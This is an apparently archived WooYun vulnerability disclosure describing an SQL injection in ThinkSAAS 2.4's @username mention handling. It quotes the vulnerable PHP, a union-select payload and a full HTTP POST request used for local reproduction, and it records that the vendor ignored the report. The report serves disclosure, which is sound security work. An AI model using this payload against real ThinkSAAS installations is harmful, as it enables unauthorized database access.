当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111518

漏洞标题:ThinkSAAS 最新版注入

相关厂商:thinksaas.cn

漏洞作者: testing

提交时间:2015-05-10 18:25

修复时间:2015-08-13 18:26

公开时间:2015-08-13 18:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-10: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

ThinkSAAS 2.4

详细说明:

app\group\action\add.php 60行开始

// 执行发布帖子
        case "do" :
                
                ......省略......
                
                $groupid = intval ( $_POST ['groupid'] );
                $title = trim( $_POST ['title'] );
                
                $content =  tsClean( $_POST ['content'] );
                $typeid = intval ( $_POST ['typeid'] );
                $tag = $_POST ['tag'];
                
                ......省略......
                
                // 处理@用户名
                if (preg_match_all ( '/@/', $content, $at )) {
                        preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches );
                        
                        $unames = $matches [1];
                        
                        $ns = "'" . implode ( "','", $unames ) . "'";
                        
                        $csql = "username IN($ns)";
                        
                        if ($unames) {
                                
                                $query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );
                                
                                foreach ( $query as $v ) {
                                        $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content );
                                        $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array (
                                                        'id' => $topicid 
                                        ) );
                                        aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content );
                                }
                                $new ['group']->update ( 'group_topic', array (
                                                'topicid' => $topicid 
                                ), array (
                                                'content' => $content 
                                ) );
                        }
                }
                
                ......省略......


tsClean函数

function tsClean($text) {
        $text = stripslashes(trim($text));
        //去除前后空格,并去除反斜杠
        //$text = br2nl($text); //将br转换成/n
        ///////XSS start
        require_once 'thinksaas/xsshtml.class.php';
        $xss = new XssHtml($text);
        $text = $xss -> getHtml();
        //$text = substr ($text, 4);//去除左边<p>标签
        //$text = substr ($text, 0,-5);//去除右边</p>标签
        ///////XSS end
        //$text = html_entity_decode($text,ENT_NOQUOTES,"utf-8");//把 HTML 实体转换为字符
        //$text = strip_tags($text); //去掉HTML及PHP标记
        //$text = cleanJs ( $text );
        $text = htmlentities($text, ENT_NOQUOTES, "utf-8");
        //把字符转换为 HTML 实体
        return $text;
}


$_POST ['content']在初始化时经过addslashes,进入 tsClean函数stripslashes除去了转义,再除去xss代码,赋给content
变量。
preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches ); 判断文章内容是否有@某个用户,如果有则提取@的用户名。
$ns = "'" . implode ( "','", $unames ) . "'";
$csql = "username IN($ns)";
最后进入$csql ,并执行$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );
可以闭合单引号,实现注入。
对查询的结果,进行如下处理。

$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );
                                
                                foreach ( $query as $v ) {
                                        $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content );
                                        $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array (
                                                        'id' => $topicid 
                                        ) );
                                        aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content );
                                }
                                $new ['group']->update ( 'group_topic', array (
                                                'topicid' => $topicid 
                                ), array (
                                                'content' => $content 
                                ) );


将原文章内容中 @admin 的形式替换成 [@admin:1111]这种形式。最后在显示时[@admin:1111]会转化为:
<a '="" uid="1111" rel="face" href="http://127.0.0.1/thinksaas/index.php?app=user&ac=space&id=1111 ">@admin</a>
显示出注入结果。
前提:系统存在2个账户,例如admin和test。
于是构造payload,把content赋值:
<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>
会执行select userid,username from user_info where username IN('admin')/**/union/**/select/**/version(),'test'#')
payload被替换为:
<p>aaaa [@admin:1111]')/**/union/**/select/**/version(),'test'# aaaaaa[@test:注入结果] aaaa<br/></p>
http包:

POST /thinksaas/index.php?app=group&ac=add&ts=do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/thinksaas/index.php?app=group&ac=add&id=1
Cookie: c_secure_ssl=bm9wZQ%3D%3D; c_secure_uid=MQ%3D%3D; c_secure_pass=d2f4d9c199d480bde1c7527ab5f00f67; c_secure_tracker_ssl=bm9wZQ%3D%3D; c_secure_login=bm9wZQ%3D%3D; PHPSESSID=v56iku742gj03lrpu8dhmhqrn6; ts_autologin=6wgf4rovqk4c8ckso04wswosg0owwc0; ts_email=admin%40admin.com
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16131784015115
Content-Length: 788
-----------------------------16131784015115
Content-Disposition: form-data; name="title"
sql
-----------------------------16131784015115
Content-Disposition: form-data; name="content"
<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>
-----------------------------16131784015115
Content-Disposition: form-data; name="tag"
-----------------------------16131784015115
Content-Disposition: form-data; name="iscomment"
0
-----------------------------16131784015115
Content-Disposition: form-data; name="iscommentshow"
0
-----------------------------16131784015115
Content-Disposition: form-data; name="groupid"
1
-----------------------------16131784015115
Content-Disposition: form-data; name="token"
79e185a1215f76ec26e0aa120ec8240f0eb3aa1a
-----------------------------16131784015115--


QQ截图20150501174213.jpg

漏洞证明:

官网有云waf,只做了本地复现

修复方案:

版权声明:转载请注明来源 testing@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-13 18:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无